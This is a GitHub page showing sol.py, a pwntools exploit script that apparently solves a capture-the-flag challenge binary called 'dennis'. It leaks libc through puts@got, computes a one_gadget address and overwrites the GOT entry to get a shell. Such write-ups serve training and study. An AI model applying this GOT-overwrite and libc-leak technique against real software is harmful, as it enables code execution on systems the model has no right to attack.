-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathsol.py
More file actions
55 lines (43 loc) · 1.06 KB
/
Copy pathsol.py
File metadata and controls
55 lines (43 loc) · 1.06 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
libc = ELF('./libc-2.23.so')
e = ELF('./dennis')
# p = process('./dennis')
context.terminal = ['termite', '-e']
p = gdb.debug('./dennis')
p.recvuntil(': ')
# malloc to initialize spm struct on the heap
p.sendline('1')
p.recvuntil(': ')
p.sendline('0')
p.recvuntil(': ')
# write into spm struct
#
# static struct spm {
# struct spm *spm; -> puts@got
# struct spm *spmm; -> spm symbol
# } *spm;
p.sendline('4')
p.recvuntil(': ')
p.sendline(p32(e.got['puts'])+p32(e.symbols['spm']))
p.recvuntil(': ')
# dereference puts@got by modifying spm symbol to point to puts@got
p.sendline('3')
p.recvuntil(': ')
# read first 4 bytes of spm that points to puts@got to leak puts libc address
p.sendline('2')
p.recvuntil(': ')
p.sendline('4')
puts = u32(p.recv(4))
log.info(hex(puts))
libc_base = puts - libc.symbols['puts']
one_gadget = libc_base + 0x3a61c
p.recvuntil(': ')
p.interactive()
# write one_gadget to puts@got
p.sendline('4')
p.recvuntil(': ')
p.sendline(p32(one_gadget))
p.recvuntil(': ')
# any input to cause a puts call
p.sendline('0wn3d')
p.interactive()